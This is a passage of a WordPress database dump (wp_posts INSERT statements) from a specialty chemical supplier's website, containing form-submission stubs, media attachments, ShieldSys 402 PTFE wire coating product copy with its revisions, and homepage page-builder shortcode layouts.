INSERT INTO `wp_posts` VALUES (4075, 0, '2017-04-25 13:18:33', '2017-04-25 13:18:33', '', '', '', 'publish', 'closed', 'closed', '', '4075', '', '', '2017-04-25 13:18:33', '2017-04-25 13:18:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/4075/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4076, 0, '2017-04-25 13:26:59', '2017-04-25 13:26:59', '', '', '', 'publish', 'closed', 'closed', '', '4076', '', '', '2017-04-25 13:26:59', '2017-04-25 13:26:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/4076/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4077, 0, '2017-04-25 15:17:41', '2017-04-25 15:17:41', '', '', '', 'publish', 'closed', 'closed', '', '4077', '', '', '2017-04-25 15:17:41', '2017-04-25 15:17:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/4077/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4078, 0, '2017-04-25 18:25:15', '2017-04-25 18:25:15', '', '', '', 'publish', 'closed', 'closed', '', '4078', '', '', '2017-04-25 18:25:16', '2017-04-25 18:25:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/4078/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4079, 0, '2017-04-25 18:48:34', '2017-04-25 18:48:34', '', '', '', 'publish', 'closed', 'closed', '', '4079', '', '', '2017-04-25 18:48:34', '2017-04-25 18:48:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/4079/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4080, 0, '2017-04-25 20:27:56', '2017-04-25 20:27:56', '', '', '', 'publish', 'closed', 'closed', '', '4080', '', '', '2017-04-25 20:27:56', '2017-04-25 20:27:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/4080/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4081, 0, '2017-04-25 20:28:40', '2017-04-25 20:28:40', '', '', '', 'publish', 'closed', 'closed', '', '4081', '', '', '2017-04-25 20:28:40', '2017-04-25 20:28:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/4081/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4082, 0, '2017-04-25 23:33:50', '2017-04-25 23:33:50', '', '', '', 'publish', 'closed', 'closed', '', '4082', '', '', '2017-04-25 23:33:50', '2017-04-25 23:33:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4082/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4083, 0, '2017-04-26 23:01:35', '2017-04-26 23:01:35', '', '', '', 'publish', 'closed', 'closed', '', '4083', '', '', '2017-04-26 23:01:36', '2017-04-26 23:01:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4083/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4084, 0, '2017-04-27 11:21:55', '2017-04-27 11:21:55', '', '', '', 'publish', 'closed', 'closed', '', '4084', '', '', '2017-04-27 11:21:56', '2017-04-27 11:21:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/4084/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4085, 0, '2017-04-27 14:30:24', '2017-04-27 14:30:24', '', '', '', 'publish', 'closed', 'closed', '', '4085', '', '', '2017-04-27 14:30:24', '2017-04-27 14:30:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/4085/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4086, 0, '2017-04-28 10:00:23', '2017-04-28 10:00:23', '', '', '', 'publish', 'closed', 'closed', '', '4086', '', '', '2017-04-28 10:00:23', '2017-04-28 10:00:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/4086/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4087, 3, '2017-04-28 12:24:46', '2017-04-28 12:24:46', 'Silicone Conformal Coating', 'Silicone Conformal Coating MS-460H_462H', '', 'inherit', 'closed', 'closed', '', 'ms-460h-462h', '', '', '2017-04-28 12:25:28', '2017-04-28 12:25:28', '', 620, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-460H-462H.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4088, 0, '2017-04-28 12:45:13', '2017-04-28 12:45:13', '', '', '', 'publish', 'closed', 'closed', '', '4088', '', '', '2017-04-28 12:45:13', '2017-04-28 12:45:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/4088/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4089, 3, '2017-04-28 14:13:02', '2017-04-28 14:13:02', '', 'ShieldSys 520 Wire Coating', '', 'inherit', 'closed', 'closed', '', 'shieldsys-520', '', '', '2017-04-28 14:13:21', '2017-04-28 14:13:21', '', 3989, 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/ShieldSys-520.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4090, 3, '2017-04-28 14:59:11', '2017-04-28 14:59:11', '<h2>ShieldSys™ 402 PTFE Wire Coatings</h2>\r\n<h3>Advanced Chemistry; Superior Durability and Abrasion Resistance; Rapid, Low-Temperature Cure</h3>\r\nShieldSys™ 402 <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a> wire coatings are designed to provide unmatched lubricity and anti-stick properties to all wires, cables, and composites materials. This coating adds high lubricity and antistick properties to metal, glass, rubber, and plastic surfaces. ShieldSys 402 wire coating is a isopropyl alcohol based dispersion offering accelerated dry and cure times relatives to ShieldSys 815 and 520.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 402 is a proprietary PTFE wire coating formulation providing unmatched surface adhesion, durability and wear resistance to applied surfaces.\r\n<h3><strong>Advantages of ShieldSys™ 402 PTFE Wire Coatings:</strong></h3>\r\nShieldSys 402 exhibit outstanding lubricity and extremely low coefficient of friction. Coating wire conductors provides a nonstick surface so insulation strips away easily. Coating insulated wire provides nonstick so multiple twisted wires do not stick together. The patented polymer is thermally stable and can be used at temperatures up to 250°C . The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\r\n<h3><strong>Wire Drawing Lubricant:</strong></h3>\r\nShieldSys 402 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\r\n<h3><strong>Coating and Wire Stripping:</strong></h3>\r\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. Our PTFE Wire Coating dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Benefits include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\r\n<h3><strong>Processing Details:</strong></h3>\r\nThe application of ShieldSys DryFilm products fits easily into most wire or coating production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat your material. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation, spooling or final operation. Quick drying can be achieved by using the solvent-based products that use isopropyl alcohol like ShieldSys 402 PTFE Wire Coatings.', 'ShieldSys™ 402 PTFE Wire Coatings', 'ShieldSys 402 PTFE Wire Coating is a solvent-based system designed to provide robust anti-stick and wear resistance for a variety of applications and substrates. This coating adds high lubricity and low coefficient of friction properties to metal, glass, rubber, and plastic surfaces. Utilization of a specialized binding system allows for enhance durability and wear resistance. ShieldSys 402 solvent-based formulation offers accelerated drying and cure times relative to ShieldSys 815 and 520. Properly applied, it will develop a high adhesion, durable coating that excels on all insulating or conducting applications and as a dry barrier lubricant. Benefits include:\r\n<ul>\r\n 	<li>High lubricity; Anti-stick properties</li>\r\n 	<li>Enhance wear resistance</li>\r\n 	<li>Excellent adhesion to most substrates</li>\r\n 	<li>Non-migrating; Non-oil lubricant</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'ptfe-wire-coatings', '', '', '2017-06-26 16:01:55', '2017-06-26 16:01:55', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4090', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4091, 3, '2017-04-28 14:47:16', '2017-04-28 14:47:16', '', 'PTFE Wire Coatings', 'ShieldSys 402', 'inherit', 'closed', 'closed', '', 'shutterstock_429063457', '', '', '2017-04-28 14:47:49', '2017-04-28 14:47:49', '', 4090, 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/shutterstock_429063457.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4092, 3, '2017-04-28 14:50:50', '2017-04-28 14:50:50', '', 'PTFE Wire Coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_105928856-2', '', '', '2017-05-26 17:13:35', '2017-05-26 17:13:35', '', 4090, 'https://www.miller-stephenson.com/wp-content/uploads/2017/04/shutterstock_105928856-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4093, 3, '2017-06-26 16:00:39', '2017-06-26 16:00:39', '<h2>ShieldSys™ 402 PTFE Wire Coatings</h2>\n<h3>Advanced Chemistry; Superior Durability and Abrasion Resistance; Rapid, Low-Temperature Cure</h3>\nShieldSys 402 <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a> wire coatings are designed to provide unmatched lubricity and anti-stick properties to all wires, cables, and composites materials. This coating adds high lubricity and antistick properties to metal, glass, rubber, and plastic surfaces. ShieldSys 402 wire coating is a isopropyl alcohol based dispersion offering accelerated dry and cure times relatives to ShieldSys 815 and 520.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 402 is a proprietary PTFE wire coating formulation providing unmatched surface adhesion, durability and wear resistance to applied surfaces.\n<h3><strong>Advantages of ShieldSys™ 402 PTFE Wire Coatings:</strong></h3>\nShieldSys 402 exhibit outstanding lubricity and extremely low coefficient of friction. Coating wire conductors provides a nonstick surface so insulation strips away easily. Coating insulated wire provides nonstick so multiple twisted wires do not stick together. The patented polymer is thermally stable and can be used at temperatures up to 250°C . The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\n<h3><strong>Wire Drawing Lubricant:</strong></h3>\nShieldSys 402 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\n<h3><strong>Coating and Wire Stripping:</strong></h3>\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. Our PTFE Wire Coating dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Benefits include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\n<h3><strong>Processing Details:</strong></h3>\nThe application of ShieldSys DryFilm products fits easily into most wire or coating production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat your material. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation, spooling or final operation. Quick drying can be achieved by using the solvent-based products that use isopropyl alcohol like ShieldSys 402 PTFE Wire Coatings.', 'ShieldSys™ 402 PTFE Wire Coatings', 'ShieldSys 402 PTFE Wire Coating is a solvent-based system designed to provide robust anti-stick and wear resistance for a variety of applications and substrates. This coating adds high lubricity and low coefficient of friction properties to metal, glass, rubber, and plastic surfaces. Utilization of a specialized binding system allows for enhance durability and wear resistance. ShieldSys 402 solvent-based formulation offers accelerated drying and cure times relative to ShieldSys 815 and 520. Properly applied, it will develop a high adhesion, durable coating that excels on all insulating or conducting applications and as a dry barrier lubricant. Benefits include:\n<ul>\n 	<li>High lubricity; Anti-stick properties</li>\n 	<li>Enhance wear resistance</li>\n 	<li>Excellent adhesion to most substrates</li>\n 	<li>Non-migrating; Non-oil lubricant</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4090-autosave-v1', '', '', '2017-06-26 16:00:39', '2017-06-26 16:00:39', '', 4090, 'https://www.miller-stephenson.com/4090-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4096, 1, '2017-04-28 17:35:53', '2017-04-28 17:35:53', '<h2><strong>ShieldSys 402 PTFE Wire Coatings Introduction</strong></h2>\r\nShieldSys 402 <a href="https://en.wikipedia.org/wiki/Polytetrafluoroethylene">PTFE</a> wire coatings are designed to provide unmatched lubricity and anti-stick properties to all wires, cables, and composites materials. This coating adds high lubricity and antistick properties to metal, glass, rubber, and plastic surfaces. ShieldSys 402 wire coating is a isopropyl alcohol based dispersion offering accelerated dry and cure times relatives to ShieldSys 815 and 520.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 402 is a proprietary PTFE wire coating formulation providing unmatched surface adhesion, durability and wear resistance to applied surfaces.\r\n<h4><strong>Advantages of Insulator &amp; Conductor Coating:</strong></h4>\r\nShieldSys 402 exhibit outstanding lubricity and extremely low coefficient of friction. Coating wire conductors provides a nonstick surface so insulation strips away easily. Coating insulated wire provides nonstick so multiple twisted wires do not stick together. The patented polymer is thermally stable and can be used at temperatures up to 250°C . The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\r\n<h4><strong>Wire Drawing Lubricant:</strong></h4>\r\nShieldSys 402 PTFE wire coating is a high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.\r\n<h4><strong>Coating and Wire Stripping:</strong></h4>\r\nDue to ShieldSys\' unique properties they are the ideal coatings for enhancing lubricity and antistick properties on conductor or insulated wire and cable. Our PTFE Wire Coating dispersions are used to impart a thin nonstick film on metal wires as well as on insulated wire and cable products and twisted wire in jackets. Benefits include: reduce insulation stripping force, provide nonstick (abrasion resistance) to twisted wire, and a lubricant for welding wire, wire forming, and knitting.\r\n<h4><strong>Processing Details:</strong></h4>\r\nThe application of ShieldSys DryFilm products fits easily into most wire or coating production facilities. The wire can be run through a dispersion bath containing one our PTFE wire coatings. Alternately, conventional spraying equipment can be used to coat your material. A heating or drying step is recommended to ensure the carrier has evaporated prior to insulation, spooling or final operation. Quick drying can be achieved by using the solvent-based products that use isopropyl alcohol like ShieldSys 402 PTFE Wire Coatings.', 'ShieldSys™ 402 PTFE Wire Coatings', 'ShieldSys 402 PTFE Wire Coatings is Isopropyl Alcohol coating designed to provide robust anti-stick and wear resistance for a variety of applications. This coating adds high lubricity and antistick properties to metal, glass, rubber, and plastic surfaces. Due to it solvent-based formulation, it offers accelerated drying and cure times relative to ShieldSys 815 and 520. Properly applied, it will develop a high adhesion and durable coating that excels on all insulating or conducting applications and as a dry lubricant. Benefits include:\r\n<ul>\r\n 	<li>High lubricity; Anti-stick properties</li>\r\n 	<li>Enhance wear resistance</li>\r\n 	<li>Excellent adhesion to most substrates</li>\r\n 	<li>Non-migrating; Non-oil lubricant</li>\r\n</ul>', 'inherit', 'closed', 'closed', '', '4090-autosave-v1', '', '', '2017-04-28 17:35:53', '2017-04-28 17:35:53', '', 4090, 'https://www.miller-stephenson.com/4090-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4097, 0, '2017-04-28 17:54:35', '2017-04-28 17:54:35', '', '', '', 'publish', 'closed', 'closed', '', '4097', '', '', '2017-04-28 17:54:35', '2017-04-28 17:54:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/4097/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4098, 0, '2017-04-28 18:56:19', '2017-04-28 18:56:19', '', '', '', 'publish', 'closed', 'closed', '', '4098', '', '', '2017-04-28 18:56:19', '2017-04-28 18:56:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/4098/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4099, 0, '2017-04-30 02:19:16', '2017-04-30 02:19:16', '', '', '', 'publish', 'closed', 'closed', '', '4099', '', '', '2017-04-30 02:19:16', '2017-04-30 02:19:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/4099/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4100, 0, '2017-04-30 11:13:33', '2017-04-30 11:13:33', '', '', '', 'publish', 'closed', 'closed', '', '4100', '', '', '2017-04-30 11:13:34', '2017-04-30 11:13:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/4100/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4102, 2, '2017-05-01 13:44:41', '2017-05-01 13:44:41', '', 'industrial-medical coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_195767891', '', '', '2017-05-30 14:37:10', '2017-05-30 14:37:10', '', 4321, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4103, 2, '2017-05-01 13:47:41', '2017-05-01 13:47:41', '', 'medical-device-coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_136813127', '', '', '2017-05-01 13:48:15', '2017-05-01 13:48:15', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_136813127.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4104, 2, '2017-05-01 13:50:01', '2017-05-01 13:50:01', '', 'Medical Wire Coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_554195710', '', '', '2017-05-01 13:50:17', '2017-05-01 13:50:17', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_554195710.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4105, 2, '2017-05-01 13:52:54', '2017-05-01 13:52:54', '', 'Industrial Wire Coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_280244540', '', '', '2017-05-30 14:36:42', '2017-05-30 14:36:42', '', 4321, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4106, 2, '2017-05-01 14:02:05', '2017-05-01 14:02:05', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="13" height="1-4"]\n\n[ux_image id="3986"]\n\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 14:02:05', '2017-05-01 14:02:05', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4107, 2, '2017-05-01 14:17:50', '2017-05-01 14:17:50', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="13" height="1-4"]\n\n[ux_banner height="500px" bg="3986" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="55"]\n\n[button text="Industrial & medical coatings" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image 